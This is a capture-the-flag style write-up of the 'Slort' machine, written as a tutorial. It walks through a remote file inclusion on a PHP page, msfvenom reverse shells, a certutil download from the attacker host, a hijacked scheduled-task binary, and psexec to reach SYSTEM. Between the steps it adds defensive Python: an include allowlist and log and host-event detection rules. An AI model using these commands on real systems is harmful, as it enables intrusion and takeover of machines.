# Slort

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2Fl9bKXKaXmKbvMwTnHD0m%2Fimage.png?alt=media&#x26;token=65bce938-637a-4a10-a192-f437bec458e0" alt=""><figcaption></figcaption></figure>

### Nmap

```bash
sudo nmap 192.168.230.53 -p- -sS -sV

PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           FileZilla ftpd 0.9.41 beta
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
3306/tcp  open  mysql?
4443/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
5040/tcp  open  unknown
7680/tcp  open  pando-pub?
8080/tcp  open  http          Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
```

Both ports 8080 and 4443 serve the same web root, and each redirects to the XAMPP /dashboard/ directory.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FT6RhQGuGayKcvJiKZaIT%2Fimage.png?alt=media&#x26;token=510a230a-b5cf-4865-8aee-767be16bc1e8" alt=""><figcaption></figcaption></figure>

Running `dirsearch.py` against the target reveals the /site page.

```
python3 dirsearch.py -u http://192.168.230.53:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url 
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FozopyZ9eN2a9NP1w00DV%2Fimage.png?alt=media&#x26;token=ce5466b6-385a-4b22-b292-4662a84b16a1" alt=""><figcaption></figcaption></figure>

The /site/index.php page:

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FopZhpqUcYAjSUraN2x0Q%2Fimage.png?alt=media&#x26;token=5e37a4d3-5f72-4006-809a-6f0f5c9d849f" alt=""><figcaption></figcaption></figure>

Looking closely at the full URL of the index.php page, we see the following:

```
http://192.168.230.53:8080/site/index.php?page=main.php
```

Looking at the `index.php?page=<value>` part of the URL, we can test whether the page parameter is vulnerable to RFI. I created a test.txt file on my attacking machine and then hosted the directory with a `Python SimpleHTTPServer`. I then browsed to the following:

```
http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/test.txt
```

This confirms RFI:

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FguXoWqIjWLWc0CdiUcFB%2Fimage.png?alt=media&#x26;token=a120d890-3891-4f97-991c-304a74fb7d16" alt=""><figcaption></figcaption></figure>
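The weakness here is that `index.php` includes whatever the `page` parameter names. The following is an added example, not code from the page or from the machine's own source: a Python model of the vulnerable lookup beside an allowlist-based one, plus a detector that runs over Apache access-log lines and flags any `page=` value that carries a URL scheme, a path separator or a `..` step. The allowlist entries other than `main.php`, the log format and the log lines are constructed for the example; the detector also decodes percent-encoded values, which the page's plain-URL case does not need but a real log will.

```python
"""Model of the page= include behind /site/index.php: the vulnerable lookup beside a
hardened allowlist lookup, plus a detector for Apache access-log lines whose page=
value points at a remote URL or steps out of the web root.
Added example: the allowlist, the log format and the log lines are constructed here;
they are not the machine's source or its real logs."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Pages index.php is allowed to include. main.php is the only value seen on the
# page; the other two are assumed for the example.
ALLOWED_PAGES = {"main.php", "about.php", "contact.php"}

def vulnerable_resolve(page: str) -> str:
    """Mirrors include($_GET['page']) with allow_url_include enabled: whatever the
    client sends is what gets included, so http://attacker/test.txt is accepted."""
    return page

def hardened_resolve(page: str, default: str = "main.php") -> str:
    """Return the requested page only if it is on the allowlist, otherwise the default.
    The value is compared as a whole, so schemes, slashes and '..' never get through."""
    return page if page in ALLOWED_PAGES else default

# A page= value should never carry a URL scheme, a path separator or a '..' step.
SUSPICIOUS = re.compile(r"^[a-z][a-z0-9+.-]*:|/|\\|\.\.", re.IGNORECASE)

def page_param(request_target: str) -> Optional[str]:
    """Extract the (percent-decoded) page parameter from a request target such as
    /site/index.php?page=main.php; None when the parameter is absent."""
    values = parse_qs(urlsplit(request_target).query, keep_blank_values=True).get("page")
    return values[0] if values else None

# Apache combined log format: client, identd, user, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

def scan_access_log(lines: List[str]) -> List[Tuple[str, str]]:
    """Return (client IP, page value) for each request whose page= value is suspicious."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = page_param(m.group("target"))
        if value is not None and SUSPICIOUS.search(value):
            hits.append((m.group("ip"), value))
    return hits

# Constructed access-log lines, not real traffic from the target. The third line
# carries the same kind of remote include as the second, but percent-encoded.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /site/index.php?page=main.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /site/index.php?page=http://10.0.0.9/test.txt HTTP/1.1" 200 13 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:09 +0000] "GET /site/index.php?page=http%3A%2F%2F10.0.0.9%2Fshell.php HTTP/1.1" 200 420 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [01/Jan/2024:10:00:12 +0000] "GET /dashboard/ HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, value in scan_access_log(SAMPLE_LOG):
        print(f"suspicious include from {ip}: page={value}")
```

The allowlist approach is preferable to filtering out `http://`: a denylist has to anticipate every wrapper and encoding, while an exact match against known page names accepts nothing it was not told about. On the detection side, decoding the query string before matching is what catches the third sample line.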

Since we know the target is running PHP, we can generate a PHP reverse shell with `msfvenom` and use the RFI to execute it, catching the connection with a listener.

```
msfvenom -p php/reverse_php LHOST=192.168.49.230 LPORT=21 -f raw > phpreverseshell.php
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FC41J3aui8Lnbdn88rKT3%2Fimage.png?alt=media&#x26;token=1fe59bd9-5da5-48c9-ad23-8a894d5cb0dc" alt=""><figcaption></figcaption></figure>

Host this in the same directory served by the `Python SimpleHTTPServer`, and make sure a listener is waiting on port 21 (the LPORT used above). Then browse to the shell we just generated:

```
http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2F49GZDzsscOo8QxLIXDXi%2Fimage.png?alt=media&#x26;token=d2c6aaec-f5dd-4cbe-8b9d-74778c3ed4db" alt=""><figcaption></figcaption></figure>

Once connected, we are running as the user rupert. Looking through the C:\ root directory, there is a folder called backup. Reading the info.txt inside it, the note mentions that `TFTP.EXE` is executed every 5 minutes.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FQk3PiZyxyTPsgJyTQHgs%2Fimage.png?alt=media&#x26;token=4746fbfd-d004-475c-813a-7e72ea0a0395" alt=""><figcaption></figcaption></figure>

I was able to delete `TFTP.EXE`, which means we can replace it with a malicious shell. Knowing this, we can generate a reverse shell with `msfvenom` and name it `TFTP.EXE`.

```
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.230 LPORT=21 -f exe > TFTP.EXE 
```

The shell was then pulled down to the target with `certutil.exe` from the same HTTP server:

```
certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FCIHpnkSmJ383GE1JtAPG%2Fimage.png?alt=media&#x26;token=a25ab0e1-9634-4bb9-9008-cdf39c9e51c8" alt=""><figcaption></figcaption></figure>

A `netcat` listener was set up on port 21, and after 5 minutes `TFTP.EXE` was executed by the scheduled task, giving us an administrator shell.

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2F3os1mFSphAMQXJKu5zAf%2Fimage.png?alt=media&#x26;token=efa66ace-791f-4c08-ae55-611e1d1cc778" alt=""><figcaption></figcaption></figure>

As we are administrator, we can then escalate to SYSTEM by first changing the administrator password:

```
net user administrator Password123
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2F4xK5HBITbwlzAjVHygoA%2Fimage.png?alt=media&#x26;token=eb8e267c-28c8-4d5d-a6df-910cabb6bc08" alt=""><figcaption></figcaption></figure>

Then use `psexec.py` to get a shell as SYSTEM.

```
sudo python2 psexec.py /administrator:Password123@192.168.230.53 
```

<figure><img src="https://3374622158-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FE6qr56iNnQWIFa0iLTZX%2Fuploads%2FcFimCcGNVmNkliYtiLQp%2Fimage.png?alt=media&#x26;token=95ea4532-1c36-4a4d-8eec-da139d4fcd02" alt=""><figcaption></figcaption></figure>
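Each step of the post-exploitation chain above (the `certutil.exe` download, the scheduled task launching a replaced `TFTP.EXE`, the `net user` password reset, and the service that `psexec.py` installs to get its SYSTEM shell) leaves a distinct host-side trace. The following is an added example, not code or logs from the page or the machine: a small set of detection rules run over constructed process-creation and service-install records. The field names, the `C:\backup\TFTP.EXE` path and the service name and binary path are assumptions made for the example.

```python
"""Detection rules for the post-exploitation chain above (certutil download,
scheduled task launching a replaced binary, password reset with net user, and the
service a remote-exec tool installs), run over constructed host events.
Added example: the event records and their field names are made up here; they are
not logs from the Slort machine. The paths for TFTP.EXE and the service binary are
assumptions."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed events. "process" records stand in for Sysmon Event ID 1 / Security
# 4688; "service" records stand in for System Event ID 7045.
EVENTS: List[Event] = [
    {"kind": "process", "user": "SLORT\\rupert", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE"},
    # The replaced TFTP.EXE started by the Task Scheduler service host (path assumed).
    {"kind": "process", "user": "SLORT\\Administrator", "parent": "C:\\Windows\\System32\\svchost.exe",
     "image": "C:\\backup\\TFTP.EXE", "cmdline": "C:\\backup\\TFTP.EXE"},
    {"kind": "process", "user": "SLORT\\Administrator", "parent": "C:\\Windows\\System32\\cmd.exe",
     "image": "C:\\Windows\\System32\\net.exe", "cmdline": "net user administrator Password123"},
    # Service install of the kind Impacket's psexec.py is known to perform: random
    # name, binary dropped into the ADMIN$ share (C:\Windows). Name and path constructed.
    {"kind": "service", "user": "SLORT\\Administrator", "service": "hTqLWxfR",
     "image": "C:\\Windows\\hTqLWxfR.exe"},
    # Benign activity for contrast.
    {"kind": "process", "user": "SLORT\\rupert", "parent": "C:\\Windows\\explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe info.txt"},
    {"kind": "process", "user": "NT AUTHORITY\\SYSTEM", "parent": "C:\\Windows\\System32\\services.exe",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs -p -s Schedule"},
]

URL_RE = re.compile(r"https?://", re.IGNORECASE)
# Directories a standard user cannot write to; a binary outside them that runs with
# high privilege deserves a look.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
SERVICE_DIRS = ("c:\\windows\\system32\\", "c:\\program files\\", "c:\\program files (x86)\\")
PRIVILEGED = ("\\administrator", "nt authority\\system")
NET_USER_RE = re.compile(r"^net1?(?:\.exe)?\s+user\s+(\S+)\s+([^/\s]\S*)\s*$", re.IGNORECASE)

def rule_certutil_download(ev: Event) -> bool:
    """certutil.exe with -urlcache and a URL: living-off-the-land file download."""
    if ev["kind"] != "process" or not ev["image"].lower().endswith("\\certutil.exe"):
        return False
    cmd = ev["cmdline"].lower()
    return "-urlcache" in cmd and URL_RE.search(cmd) is not None

def rule_task_runs_untrusted_binary(ev: Event) -> bool:
    """A privileged process started by a service host from a user-writable location,
    which is how a replaced scheduled-task binary shows up (svchost as parent is a
    simplification; a real rule would check the Schedule service instance)."""
    if ev["kind"] != "process":
        return False
    from_svchost = ev["parent"].lower().endswith("\\svchost.exe")
    privileged = ev["user"].lower().endswith(PRIVILEGED)
    return from_svchost and privileged and not ev["image"].lower().startswith(TRUSTED_DIRS)

def rule_password_set_from_cmdline(ev: Event) -> bool:
    """net user <account> <password>: an account password reset typed on the command line."""
    if ev["kind"] != "process" or not ev["image"].lower().endswith(("\\net.exe", "\\net1.exe")):
        return False
    return NET_USER_RE.match(ev["cmdline"].strip()) is not None

def rule_service_from_untrusted_path(ev: Event) -> bool:
    """New service whose binary sits outside the usual service directories."""
    return ev["kind"] == "service" and not ev["image"].lower().startswith(SERVICE_DIRS)

RULES: Dict[str, Callable[[Event], bool]] = {
    "certutil_download": rule_certutil_download,
    "task_runs_untrusted_binary": rule_task_runs_untrusted_binary,
    "password_set_from_cmdline": rule_password_set_from_cmdline,
    "service_from_untrusted_path": rule_service_from_untrusted_path,
}

def run_rules(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, image path) for every event a rule fires on."""
    return [(name, ev["image"]) for ev in events for name, rule in RULES.items() if rule(ev)]

if __name__ == "__main__":
    for name, image in run_rules(EVENTS):
        print(f"{name}: {image}")
```

The root cause on this box is the writable task binary: a scheduled task running as administrator must point at a file only administrators can modify, and auditing task actions against the ACLs of their targets is the preventive check. The rules above cover what an analyst would look for after the fact; each fires exactly once on the constructed events and stays quiet on the two benign records.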
